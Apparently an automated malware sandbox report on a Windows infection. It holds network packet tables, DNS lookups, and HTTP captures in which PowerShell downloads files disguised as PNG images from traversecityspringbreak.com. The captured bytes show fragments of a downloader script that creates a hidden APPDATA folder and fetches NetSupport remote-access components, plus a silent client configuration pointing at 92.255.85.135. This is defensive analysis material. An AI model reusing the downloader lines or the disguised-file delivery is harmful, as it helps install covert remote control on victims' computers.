                                                                                                                                                              Oct 28, 2024 19:46:25.890001059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890012026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.890036106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890085936 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.890563011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890597105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890640974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.890666008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890698910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890732050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890749931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.890765905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890813112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.890819073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890851974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890886068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890899897 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891155958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891201973 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891207933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891239882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891294956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891297102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891364098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891396999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891412020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891432047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891465902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891484976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891503096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891535044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891549110 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891568899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891602993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891613960 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892146111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892199039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892199993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892235041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892272949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892286062 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892308950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892352104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892431021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892462969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892513990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892528057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892566919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892616034 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892617941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892651081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892683983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.892697096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.899034023 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502630949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502630949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502652884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502657890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502692938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502705097 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502728939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502763033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502779961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502803087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502840996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502855062 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502875090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502909899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502922058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.502943993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.502990007 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.503204107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503259897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503297091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503308058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.503379107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503413916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503426075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.503449917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503490925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503504038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.503525972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503560066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503572941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.503593922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.503642082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504009962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504044056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504077911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504090071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504132986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504167080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504179001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504201889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504236937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504249096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504297018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504331112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504345894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504365921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504400969 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504410028 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504436970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504482031 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.504909992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504925966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504942894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.504966974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.505024910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505042076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505057096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505065918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.505074978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505096912 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.505247116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505264044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505281925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505290031 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.505300045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505319118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.505322933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.505358934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.547481060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.547514915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.547549963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.547574043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.547610998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.547663927 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.553105116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.553153992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.553186893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.553206921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.553220987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.553247929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.553262949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.558501959 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.558537006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.558568001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.558569908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.558604956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.558619022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.558638096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.558684111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.563834906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.563868999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.563903093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.563920021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.563936949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.563970089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.563987970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.569252968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.569305897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.569320917 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.569340944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.569379091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.569390059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.574726105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.574759960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.574788094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.574795008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.574827909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.574860096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.574862003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.574906111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.580302954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.580353975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.580388069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.580411911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.580423117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.580471992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.585699081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.585750103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.585783005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.585803986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.585818052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.585865021 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:26.591043949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:26.591097116 CET8049726166.1.160.211192.168.2.16
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 28, 2024 19:45:14.330554962 CET | 192.168.2.16 | 1.1.1.1 | 0xfc83 | Standard query (0) | inspyrehomedesign.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:14.331037045 CET | 192.168.2.16 | 1.1.1.1 | 0xb476 | Standard query (0) | inspyrehomedesign.com | 65 | IN (0x0001) | false
Oct 28, 2024 19:45:18.216871977 CET | 192.168.2.16 | 1.1.1.1 | 0x119 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:18.217082977 CET | 192.168.2.16 | 1.1.1.1 | 0x7b98 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Oct 28, 2024 19:45:33.274823904 CET | 192.168.2.16 | 1.1.1.1 | 0xa925 | Standard query (0) | use.fontawesome.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:33.274964094 CET | 192.168.2.16 | 1.1.1.1 | 0xda7a | Standard query (0) | use.fontawesome.com | 65 | IN (0x0001) | false
Oct 28, 2024 19:45:33.277111053 CET | 192.168.2.16 | 1.1.1.1 | 0x455b | Standard query (0) | i.ibb.co | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:33.277256966 CET | 192.168.2.16 | 1.1.1.1 | 0xbc8d | Standard query (0) | i.ibb.co | 65 | IN (0x0001) | false
Oct 28, 2024 19:45:34.386877060 CET | 192.168.2.16 | 1.1.1.1 | 0xaf87 | Standard query (0) | i.ibb.co | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:34.387016058 CET | 192.168.2.16 | 1.1.1.1 | 0x8435 | Standard query (0) | i.ibb.co | 65 | IN (0x0001) | false
Oct 28, 2024 19:46:11.362775087 CET | 192.168.2.16 | 1.1.1.1 | 0x6010 | Standard query (0) | inspyrehomedesign.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:15.737689972 CET | 192.168.2.16 | 1.1.1.1 | 0xab2a | Standard query (0) | traversecityspringbreak.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:35.252579927 CET | 192.168.2.16 | 1.1.1.1 | 0x2 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:57.066961050 CET | 192.168.2.16 | 1.1.1.1 | 0x8459 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 28, 2024 19:45:14.359889984 CET | 1.1.1.1 | 192.168.2.16 | 0xfc83 | No error (0) | inspyrehomedesign.com |  | 166.1.160.75 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:18.227157116 CET | 1.1.1.1 | 192.168.2.16 | 0x119 | No error (0) | www.google.com |  | 172.217.16.196 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:18.227945089 CET | 1.1.1.1 | 192.168.2.16 | 0x7b98 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
Oct 28, 2024 19:45:33.282656908 CET | 1.1.1.1 | 192.168.2.16 | 0xa925 | No error (0) | use.fontawesome.com | use.fontawesome.com.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 28, 2024 19:45:33.282865047 CET | 1.1.1.1 | 192.168.2.16 | 0xda7a | No error (0) | use.fontawesome.com | use.fontawesome.com.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
Oct 28, 2024 19:45:33.284761906 CET | 1.1.1.1 | 192.168.2.16 | 0x455b | No error (0) | i.ibb.co |  | 162.19.58.157 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:33.284761906 CET | 1.1.1.1 | 192.168.2.16 | 0x455b | No error (0) | i.ibb.co |  | 162.19.58.159 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:33.284761906 CET | 1.1.1.1 | 192.168.2.16 | 0x455b | No error (0) | i.ibb.co |  | 162.19.58.158 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:33.284761906 CET | 1.1.1.1 | 192.168.2.16 | 0x455b | No error (0) | i.ibb.co |  | 162.19.58.161 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:33.284761906 CET | 1.1.1.1 | 192.168.2.16 | 0x455b | No error (0) | i.ibb.co |  | 162.19.58.160 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:33.284761906 CET | 1.1.1.1 | 192.168.2.16 | 0x455b | No error (0) | i.ibb.co |  | 162.19.58.156 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:45:34.394284010 CET | 1.1.1.1 | 192.168.2.16 | 0xaf87 | No error (0) | i.ibb.co |  | 169.197.85.95 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:11.381597042 CET | 1.1.1.1 | 192.168.2.16 | 0x6010 | No error (0) | inspyrehomedesign.com |  | 166.1.160.75 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:15.748879910 CET | 1.1.1.1 | 192.168.2.16 | 0xab2a | No error (0) | traversecityspringbreak.com |  | 166.1.160.211 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:35.263154030 CET | 1.1.1.1 | 192.168.2.16 | 0x2 | No error (0) | geo.netsupportsoftware.com |  | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:35.263154030 CET | 1.1.1.1 | 192.168.2.16 | 0x2 | No error (0) | geo.netsupportsoftware.com |  | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:35.263154030 CET | 1.1.1.1 | 192.168.2.16 | 0x2 | No error (0) | geo.netsupportsoftware.com |  | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:57.084337950 CET | 1.1.1.1 | 192.168.2.16 | 0x8459 | No error (0) | geo.netsupportsoftware.com |  | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:57.084337950 CET | 1.1.1.1 | 192.168.2.16 | 0x8459 | No error (0) | geo.netsupportsoftware.com |  | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 19:46:57.084337950 CET | 1.1.1.1 | 192.168.2.16 | 0x8459 | No error (0) | geo.netsupportsoftware.com |  | 104.26.0.231 | A (IP address) | IN (0x0001) | false
• inspyrehomedesign.com
• https:
  • i.ibb.co
• fs.microsoft.com
• slscr.update.microsoft.com
• www.google.com
• traversecityspringbreak.com
• 92.255.85.135 (connection: keep-alive, cmd=poll, info=1, ack=1)
• geo.netsupportsoftware.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | 7944 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 19:46:15.759381056 CET | 84 | OUT | GET /o/o.png HTTP/1.1
                                                                                                                                                              Host: traversecityspringbreak.com
                                                                                                                                                              Connection: Keep-Alive
Oct 28, 2024 19:46:16.434668064 CET | 239 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:16 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 2040
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:37:16 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "671604ac-7f8"
                                                                                                                                                              Accept-Ranges: bytes
Oct 28, 2024 19:46:16.435194016 CET | 1236 | IN | Data Ascii:
ipconfig /flushdns
$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})
$randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName
New-Item -ItemType Directory -Path $randomFolderPath
Oct 28, 2024 19:46:16.435560942 CET | 212 | IN | Data Ascii:
cicapi.dll"
$file8 = $Pach + "\PCICHEK.DLL"
$file9 = $Pach + "\PCICL32.DLL"
$file10 = $Pach + "\remcmdstub.exe"
$file11 = $Pach + "\TCCTL32.DLL"
$file12 = $Pach + "\client32.exe"
Invoke-WebRequest $url
Oct 28, 2024 19:46:16.435992002 CET | 592 | IN | Data Ascii:
-OutFile $file
Invoke-WebRequest $url2 -OutFile $file2
Invoke-WebRequest $url3 -OutFile $file3
Invoke-WebRequest $url4 -OutFile $file4
Invoke-WebRequest $url5 -OutFile $file5
Invoke-WebRequest $url6 -OutFile $file6
Invoke-WebRequest $url
Oct 28, 2024 19:46:16.830071926 CET | 155 | OUT | GET /o/1.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:16.993619919 CET | 885 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:16 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 647
                                                                                                                                                              Last-Modified: Mon, 28 Oct 2024 05:50:02 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "671f260a-287"
                                                                                                                                                              Accept-Ranges: bytes
Data Ascii:
0xe755af83
[Client]
_present=1
AlwaysOnTop=1
DisableChat=1
DisableCloseApps=0
HideWhenIdle=1
Protocols=3
RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA
RoomSpec=Eval
ShowUIOnConnect=0
silent=1
SKMode=1
SOS_Alt=0
SOS_LShift=0
SOS_RShift=0
SysTray=0
UnloadMirrorOnDisconnect=0
Usernames=*
[_Info]
Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini
[_License]
quiet=1
[Audio]
DisableAudioFilter=1
[General]
BeepUsingSpeaker=0
[HTTP]
CMPI=60
GatewayAddress=92.255.85.135:443
gsk=GL:M@AEOHD<K?ACIGO:B=H@JBOGE
gskmode=0
GSK=GL:M@AEOHD<K?ACIGO:B=H@JBOGE
GSKX=GL:M@AEOHD<K?ACIGO:B=H@JBOGE
Oct 28, 2024 19:46:17.054976940 CET | 155 | OUT | GET /o/2.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:17.218087912 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:17 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 328056
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:57 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045d-50178"
                                                                                                                                                              Accept-Ranges: bytes
Oct 28, 2024 19:46:17.218156099 CET | 1236 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ AAAA9AAgA1A0AAAARichAPELV
Oct 28, 2024 19:46:17.877283096 CET | 155 | OUT | GET /o/3.png HTTP/1.1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                              Host: traversecityspringbreak.com
Oct 28, 2024 19:46:18.039475918 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.2
                                                                                                                                                              Date: Mon, 28 Oct 2024 18:46:17 GMT
                                                                                                                                                              Content-Type: image/png
                                                                                                                                                              Content-Length: 773968
                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 07:35:58 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6716045e-bcf50"
                                                                                                                                                              Accept-Ranges: bytes
Oct 28, 2024 19:46:19.085897923 CET | 155 | OUT | GET /o/4.png HTTP/1.1
